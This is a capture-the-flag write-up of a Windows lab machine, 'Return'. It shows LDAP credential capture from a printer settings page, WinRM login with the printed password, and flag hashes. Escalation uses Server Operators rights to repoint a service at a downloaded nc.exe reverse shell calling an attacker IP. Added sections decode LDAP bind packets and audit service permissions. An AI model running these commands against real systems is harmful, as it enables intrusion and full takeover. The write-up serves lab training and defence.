Return
Recon
DNS (53)
└─$ dig ANY return.local @10.129.95.241
; <<>> DiG 9.19.21-1-Debian <<>> ANY return.local @10.129.95.241
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40410
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 4
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: e0aecc3fd2bd8c99 (echoed)
;; QUESTION SECTION:
;return.local. IN ANY
;; ANSWER SECTION:
return.local. 600 IN A 10.129.95.241
return.local. 3600 IN NS printer.return.local.
return.local. 3600 IN SOA printer.return.local. hostmaster.return.local. 123 900 600 86400 3600
return.local. 600 IN AAAA dead:beef::247
;; ADDITIONAL SECTION:
printer.return.local. 1200 IN A 10.129.95.241
printer.return.local. 1200 IN AAAA dead:beef::1d65:68c2:f133:61bd
printer.return.local. 1200 IN AAAA dead:beef::1f6
;; Query time: 84 msec
;; SERVER: 10.129.95.241#53(10.129.95.241) (TCP)
;; WHEN: Wed Nov 27 12:50:27 EST 2024
;; MSG SIZE rcvd: 238
HTTP (80)

The POST request contains nothing but an IP address. SSRF?

└─$ listen 389
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:389
Ncat: Listening on 0.0.0.0:389
Ncat: Connection from 10.129.95.241:61747.
0*`%return\svc-printer
0*`%return\svc-printer
1edFg43012!!
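The bytes that arrived on port 389 are an LDAP BindRequest: the leading `0*` and `` `% `` are the BER SEQUENCE and [APPLICATION 0] headers, and everything after the user name is the simple-bind password in the clear. The decoder below is an added example, not part of the original writeup; the two packets are constructed for it (the user name mirrors the writeup, the password and the SASL token are placeholders). It shows what a listener sees for a simple bind versus a SASL bind, which is the check a defender wants when deciding whether a device's "LDAP server" setting is leaking credentials.

```python
"""Decode an LDAPv3 BindRequest from raw bytes (RFC 4511 BER encoding).
Added example; packets below are constructed, not the writeup's capture."""

# Constructed packet 1: simple bind, messageID 1, name return\svc-printer,
# password "ConstructedPw1" (placeholder, not the real one from the box)
SIMPLE_BIND = (
    b"\x30\x2c"                        # SEQUENCE, 44 bytes   -> prints as "0,"
    b"\x02\x01\x01"                    # messageID INTEGER 1
    b"\x60\x27"                        # [APPLICATION 0] BindRequest, 39 bytes -> "`'"
    b"\x02\x01\x03"                    # version INTEGER 3
    b"\x04\x12" b"return\\svc-printer" # name OCTET STRING (18 bytes)
    b"\x80\x0e" b"ConstructedPw1"      # [0] simple: password, cleartext (14 bytes)
)

# Constructed packet 2: SASL GSS-SPNEGO bind, messageID 2, empty name,
# opaque token placeholder instead of a password
SASL_BIND = (
    b"\x30\x1d"                        # SEQUENCE, 29 bytes
    b"\x02\x01\x02"                    # messageID INTEGER 2
    b"\x60\x18"                        # BindRequest, 24 bytes
    b"\x02\x01\x03"                    # version INTEGER 3
    b"\x04\x00"                        # name: empty
    b"\xa3\x11"                        # [3] SaslCredentials, 17 bytes
    b"\x04\x0a" b"GSS-SPNEGO"          # mechanism OCTET STRING (10 bytes)
    b"\x04\x03" b"\x01\x02\x03"        # credentials: constructed 3-byte token
)


def _read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the BER TLV that starts at buf[pos]."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                  # long form: 0x8N followed by N length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def decode_bind_request(packet):
    """Parse one LDAPMessage carrying a BindRequest and report what it reveals."""
    tag, msg, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, msg_id, pos = _read_tlv(msg, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, body, _ = _read_tlv(msg, pos)
    if tag != 0x60:
        raise ValueError("not a BindRequest (tag 0x%02x)" % tag)

    _, version, pos = _read_tlv(body, 0)
    _, name, pos = _read_tlv(body, pos)
    auth_tag, auth, _ = _read_tlv(body, pos)

    result = {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "name": name.decode("utf-8", "replace"),
    }
    if auth_tag == 0x80:               # [0] simple: the password itself is on the wire
        result.update(auth="simple",
                      password=auth.decode("utf-8", "replace"),
                      cleartext_password=True)
    elif auth_tag == 0xA3:             # [3] sasl: mechanism name plus an opaque token
        _, mech, _ = _read_tlv(auth, 0)
        result.update(auth="sasl",
                      mechanism=mech.decode("utf-8", "replace"),
                      cleartext_password=False)
    else:
        raise ValueError("unknown authentication choice 0x%02x" % auth_tag)
    return result


if __name__ == "__main__":
    for pkt in (SIMPLE_BIND, SASL_BIND):
        print(decode_bind_request(pkt))
```

Without TLS (LDAPS or StartTLS), a simple bind hands the password to whichever host the client was told to contact, which is why a writable "LDAP server" field on a printer's settings page is enough for this capture; a SASL bind only exposes the mechanism name and a token.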
WinRM (svc-printer)
└─$ netexec smb 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!' --shares
SMB 10.129.95.241 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.129.95.241 445 PRINTER [+] return.local\svc-printer:1edFg43012!!
SMB 10.129.95.241 445 PRINTER [*] Enumerated shares
SMB 10.129.95.241 445 PRINTER Share Permissions Remark
SMB 10.129.95.241 445 PRINTER ----- ----------- ------
SMB 10.129.95.241 445 PRINTER ADMIN$ READ Remote Admin
SMB 10.129.95.241 445 PRINTER C$ READ,WRITE Default share
SMB 10.129.95.241 445 PRINTER IPC$ READ Remote IPC
SMB 10.129.95.241 445 PRINTER NETLOGON READ Logon server share
SMB 10.129.95.241 445 PRINTER SYSVOL READ Logon server share
└─$ netexec winrm 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!'
WINRM 10.129.95.241 5985 PRINTER [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM 10.129.95.241 5985 PRINTER [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
└─$ evil-winrm -i 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!'
*Evil-WinRM* PS C:\Users\svc-printer> whoami /all
User Name SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
User.txt
*Evil-WinRM* PS C:\Users\svc-printer> ls $ENV:USERPROFILE -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }
Directory: C:\Users\svc-printer\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/27/2024 10:05 AM 34 user.txt
68f6758bf7c0c46e0afa1683db90ef69
Privilege Escalation
Cicada had a similar privilege escalation path; more details there: [Cicada]()
Root.txt (Path 1)
*Evil-WinRM* PS C:\Users\svc-printer> robocopy /b C:\Users\Administrator\Desktop C:\Users\svc-printer root.txt
*Evil-WinRM* PS C:\Users\svc-printer> cat root.txt
4ad8c7c517a0a92c4c1a3920ff2b8373
Root.txt (Path 2)
The user is a member of the Server Operators group. That group has full control over certain services, which allows execution of arbitrary commands and privilege escalation (source).
Windows Privilege Escalation: Server Operator Group
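The service DACL is what decides this: any service whose security descriptor grants Server Operators SERVICE_CHANGE_CONFIG can have its binary path rewritten, exactly as done with VMTools below. The audit script that follows is an added example, not from the writeup; it assumes it is run in an elevated PowerShell session on the host and relies on `sc.exe sdshow` returning the descriptor as SDDL, where the trustee alias `SO` is BUILTIN\Server Operators and the two-letter right tokens `DC`, `WD` and `WO` map to SERVICE_CHANGE_CONFIG, WRITE_DAC and WRITE_OWNER.

```powershell
# Added audit script (not from the writeup): list services whose DACL lets
# BUILTIN\Server Operators (SDDL alias "SO") replace the service binary path.
# Run as an administrator on the host being audited.
$RiskyRights = @('DC', 'WD', 'WO')   # DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER
$Trustees    = @('SO')               # extend with 'AU', 'BU', 'IU' to audit other low-priv principals

$Findings = foreach ($svc in Get-Service) {
    # sc.exe (not PowerShell's 'sc' alias for Set-Content) prints the descriptor as SDDL
    $sddl = (& sc.exe sdshow $svc.Name 2>$null | Where-Object { $_ -match 'D:\(' }) -join ''
    if (-not $sddl) { continue }

    # Each ACE looks like (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO): type;flags;rights;;;trustee
    foreach ($ace in [regex]::Matches($sddl, '\(([^)]*)\)')) {
        $parts = $ace.Groups[1].Value -split ';'
        if ($parts.Count -lt 6 -or $parts[0] -ne 'A') { continue }   # access-allowed ACEs only
        $trustee = $parts[5]
        if ($Trustees -notcontains $trustee) { continue }

        # Rights are two-letter tokens run together; split on even offsets so that
        # "SD" + "CC" is not misread as containing "DC"
        $tokens  = [regex]::Matches($parts[2], '..') | ForEach-Object { $_.Value }
        $granted = $tokens | Where-Object { $RiskyRights -contains $_ }
        if ($granted) {
            [pscustomobject]@{
                Service = $svc.Name
                Trustee = $trustee
                Rights  = ($granted -join ',')
                BinPath = (Get-CimInstance Win32_Service -Filter "Name='$($svc.Name)'").PathName
            }
        }
    }
}

$Findings | Format-Table -AutoSize
```

Every service listed is a privilege escalation path for Server Operators on that host; the fix is to remove the over-broad ACE (or empty the group) rather than to watch the binary. For detection after the fact, a changed binPath lands in the registry as a write to `HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath`, which Sysmon records as Event ID 13 (RegistryEvent Value Set).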
*Evil-WinRM* PS C:\Users\svc-printer> services
Path Privileges Service
---- ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe True ADWS
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys True MpKslceeb2796
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" True VGAuthService
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" True VMTools
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe" True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe" True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe" False WMPNetworkSvc
*Evil-WinRM* PS C:\Users\svc-printer\Music> curl 10.10.14.99/nc.exe -out nc.exe
*Evil-WinRM* PS C:\Users\svc-printer\Music> sc.exe config VMTools binPath="C:\Users\svc-printer\Music\nc.exe -e powershell.exe 10.10.14.99 4444"
*Evil-WinRM* PS C:\Users\svc-printer\Music> sc.exe stop VMTools
*Evil-WinRM* PS C:\Users\svc-printer\Music> sc.exe start VMTools
---
└─$ listen
Ncat: Connection from 10.129.95.241:62800.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
nt authority\system